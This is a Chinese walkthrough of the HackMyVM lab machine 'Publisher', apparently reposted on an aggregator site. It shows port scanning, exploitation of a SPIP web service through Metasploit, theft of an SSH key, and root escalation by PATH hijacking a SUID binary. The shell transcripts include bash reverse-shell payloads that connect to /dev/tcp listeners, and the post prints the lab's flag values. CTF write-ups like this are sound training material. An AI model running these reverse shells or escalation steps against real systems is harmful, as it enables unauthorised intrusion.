Publisher - hackmyvm

news2024/12/23 23:17:31

简介

靶机名称:Publisher

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Publisher

本地环境

虚拟机:vitual box

靶场IP(Publisher):192.168.56.123

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(kali):192.168.190.131

扫描

nmap有点慢,fscan先探路

fscan -h 192.168.56.123 -nobr -p "1-65535"

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.56.123:22 open
192.168.56.123:110 open
192.168.56.123:80 open
192.168.56.123:25 open

没有22还是挺意外的。

HTTP

spip服务

image-20240625101055756

路径扫描一下,发现主要服务布置在/spip/路径下

feroxbuster -u http://192.168.56.123/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt  -C 500

image-20240625101921573

image-20240625102014244

msf中找到poc,直接打

image-20240625102513225

think用户目录下有user.txt

fa229046d44eda6a3598c73ad96f4ca5

image-20240625104849073

提权

我们对think的ssh私钥有读取权限。直接拉下来,ssh登陆上去

image-20240625105202089

ssh think@192.168.56.123 -i ./id_rsa 

image-20240625105237079

值得一提的是,think用户执行linpeas识别不到容器环境,也无法在根目录找到.dockerenv文件夹,但是www-data用户就可以……除此之外think还有大大小小的限制,少见的web用户还能比普通用户权限更高

image-20240625110248546

image-20240625121530830

查看SUID权限,发现有一个run_container可以用

find / -perm -u=s -type f 2>/dev/null 

image-20240625125311620

无法运行,但至少可读。拉下来看一下

image-20240722145102157

总之就是会执行一下/opt/run_container.sh这个脚本文件。很神奇我们连查看权限都没有,但就是能执行。

image-20240722145339178

image-20240722153555483

不知道ID的话,就重新进入www-data用户,查/etc/hosts

image-20240722170813931

41c976e507f8

​ 随便输入的话,还会看到有一个对脚本16行的报错。因为缺失这个命令,我们可以尝试通过PATH进行劫持。

image-20240722171501476

think@publisher:/tmp$ touch  validate_container_id
think@publisher:/tmp$ vim validate_container_id
think@publisher:/tmp$ cat validate_container_id
bash -i &>/dev/tcp/192.168.56.1/30000 <&1
think@publisher:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
think@publisher:/tmp$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp

然后就发现我们对run_container.sh有完全的控制权了

image-20240729203310658

往run_container.sh中写入提权命令,然后执行bash -p即可

think@publisher:/opt$ cat run_container.sh
cat run_container.sh
#!/bin/bash
bash -c "bash -i >& /dev/tcp/192.168.56.1/40000 0>&1"
think@publisher:/opt$ /usr/sbin/run_container
/usr/sbin/run_container
think@publisher:/opt$ bash -p
bash -p
bash-5.0# id
id
uid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)
bash-5.0# cat /root/root.txt
cat /root/root.txt
3a4225cc9e85709adda6ef55d6a4f2ca

over

后记

还是有点疑惑的,/usr/sbin/run_container 的SUID是root,但是通过它执行反弹shell却仍然是think用户。

除此之外,可以从一些痕迹看出来我们拿到的shell是受限shell,但并不是很明确其是如何实现对think用户无法访问opt文件夹的限制。感觉就是很神奇。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1970599.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

用Python实现AI人脸识别

实现AI人脸识别通常涉及到使用深度学习库&#xff0c;如TensorFlow或PyTorch&#xff0c;配合预训练的人脸识别模型。以下是一个使用Python和TensorFlow框架中的tensorflow_hub模块来加载和使用一个预训练的人脸识别模型的简单示例。 步骤 1: 安装必要的库 首先&#xff0c;你…

【已解决】在Docker的Alpine容器中使用Docke

在Docker中使用Docker有很多种方法。 这里介绍一种在Alpine中安装使用Docker的方法&#xff0c;这种方法使用的不是宿主机的Docker&#xff0c;而是容器自身的&#xff0c;所以封装起来比较方便。 运行Alpine 用以下命令运行一个Alpine&#xff0c;记得开启--privileged参数&…

一个纯前端实现的头像生成网站

大家好&#xff0c;我是 Java陈序员。 今天&#xff0c;给大家介绍一个纯前端实现的头像生成网站。 关注微信公众号&#xff1a;【Java陈序员】&#xff0c;获取开源项目分享、AI副业分享、超200本经典计算机电子书籍等。 项目介绍 vue-color-avatar —— 一款基于 Vite Vue…

SpringBoot 依赖之Validation

Validation Validation 依赖名称: Validation功能描述: Bean Validation with Hibernate validator.使用 Hibernate 验证器进行 Bean 验证。 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-validation&…

适用于 Mac 和 Windows 电脑的九大数据恢复软件

你们中的一些人肯定经历过由于计算机意外删除、系统崩溃、格式化、病毒攻击等而导致的严重数据丢失。 感觉不一样&#xff1f; 不用担心&#xff0c;使用数据恢复软件可以找回已删除或丢失的文件。 适用于 Mac 和 Windows 电脑的九大数据恢复软件 这里我们收集了大多数用户对…

好家伙,路由器也会中暑,你信吗?

前言 盛夏已经来很久了&#xff0c;这几天广州的天气就像女朋友&#xff0c;说变脸就变脸…… 一会儿下雨&#xff0c;一会儿又是热情满满的大晴天&#xff01; 伴随着这一切来的就是热、很热、闷热&#xff01; 感觉在阳光底下晒个2秒&#xff0c;整个人就会融化消失。 就…

RabbitMQ知识总结(工作模式)

文章收录在网站&#xff1a;http://hardyfish.top/ 文章收录在网站&#xff1a;http://hardyfish.top/ 文章收录在网站&#xff1a;http://hardyfish.top/ 文章收录在网站&#xff1a;http://hardyfish.top/ 工作模式 简单模式 一个生产者对应一个消费者&#xff0c;通过队…

预测未来 | MATLAB实现RF随机森林多变量时间序列预测未来-预测新数据

预测未来 | MATLAB实现RF随机森林多变量时间序列预测未来-预测新数据 预测效果 基本介绍 随机森林属于 集成学习 中的 Bagging(Bootstrap AGgregation 的简称) 方法。如果用图来表示他们之间的关系如下: 随机森林是由很多决策树构成的,不同决策树之间没有关联。当我们进行…

基于raid10的Fastdfs HA搭建

1. Fastdfs HA原理 - Fastdfs引入Tracker以支持文件操作的负载均衡调度 - Fastdfs引入基于group分组的storage以支持类似raid10模式的高可靠高性能的存储 - Fastdfs引入fastdfs-nginx-module 可以重定向文件连接到文件上传时的源服务器取文件,避免客户端由于复制延迟导致的文…

揭秘线性代数秩的奥秘:从理论到机器学习的跨越

一、线性代数中的秩&#xff1a;定义与性质 1.1 定义 在线性代数中&#xff0c;秩是一个核心概念&#xff0c;用于描述矩阵或向量组的复杂性和独立性。具体而言&#xff0c;一个矩阵的秩定义为该矩阵中非零子式的最高阶数&#xff0c;而一个向量组的秩则是其最大无关组所含的…

图像分割与图像(目标)监测

图像分割与图像&#xff08;目标&#xff09;监测 图片来自于1.语义分割与实例分割概述_哔哩哔哩_bilibili 图像监测与图像分割是计算机视觉领域的两个重要应用&#xff0c;它们在众多领域如医疗影像分析、遥感图像处理、自动驾驶车辆等都扮演着关键角色。 下面将详细介绍这两…

字符设备驱动开发基础—静态/动态注册设备号,使用cdev注册驱动

文章目录 主次设备号介绍主设备号 (Major Number)次设备号 (Minor Number)设备号的表示与注册设备号的获取设备号的注册 设备文件的创建实际应用中的主次设备号 cdev 结构体介绍cdev 结构体主要字段 使用 cdev 结构体的步骤file_operations 结构体 静态注册设备号示例代码&…

商业银行国际结算规模创新高,合合信息AI助力金融行业智能处理多版式文档

随着我国外贸新业态的快速增长&#xff0c;银行国际结算业务在服务实体经济发展、促进贸易投资便利化进程中发挥了越来越重要的作用。根据中国银行业协会近日发布的《中国贸易金融行业发展报告&#xff08;2023—2024&#xff09;》&#xff0c;2023年我国主要商业银行国际结算…

【征求意见】同济大学--城镇给水厂碳排放核算与评价方法

城镇给水厂保障城镇居民正常生活&#xff0c;是社会经济良性发展的重要基础性设施&#xff0c;对于我国双碳战略目标的实现至关重要。 随着城镇化的发展&#xff0c;城镇供水量不断升高&#xff0c;加上 水资源与生态环境问题不断涌现&#xff0c;人们对水的安全和品质的需求日…

关于在局域网如何避免内网IP被占用的问题

目录 前言 1.使用ipconfig命令 2.排查IP是否被占用&#xff0c;使用ping命令。 3.ip地址冲突&#xff0c;无法访问网站怎么办&#xff1f; 4.怎么避免重启再次出现IP冲突问题&#xff1f; 前言 在一些小型的公司&#xff0c;IP地址没有被规划好&#xff0c;每个人都是通过动…

基于 Rough.js 的 Vue 散点图绘制

本文由ScriptEcho平台提供技术支持 项目地址&#xff1a;传送门 基于 Rough.js 的 Vue 散点图绘制 应用场景 本代码展示了如何使用 Rough.js 库在 Vue 应用程序中绘制散点图。Rough.js 是一个轻量级 JavaScript 库&#xff0c;用于创建具有手绘风格的可视化效果。散点图是一…

c++学习笔记—内存概念

c学习笔记 Bit含义用途特点 字节含义用途特点注意事项 c内存基本概念1. 栈&#xff08;Stack&#xff09;2. 堆&#xff08;Heap&#xff09;3. 全局/静态存储区4. 常量存储区5. 内存管理关键字和函数6. 内存泄漏7. 指针和引用8. 虚拟内存9. 内存对齐10. 构造和析构 c中基本数据…

用神经网络求解方案

在处理密集、计算量大的数学问题时&#xff0c;计算机系统一直是人类最好的朋友。从计算器上的简单计算到 R 中的大型统计运算&#xff0c;这一技术前沿使我们很多人的生活变得更加轻松。 然而&#xff0c;即使是计算机&#xff0c;当数字变成字母并开始涉及代数时&#xff0c…

微信公众号使用介绍

写在前面&#xff0c;楼下有个医生小姐姐想做个公众号&#xff0c;整理了一份文档入门用 一 订阅号和服务号区别 1.1 关于功能上的差异 订阅号&#xff08;Subscription Account&#xff09; 定位&#xff1a;主要用于提供信息传播和互动&#xff0c;适合媒体、个人博主、机…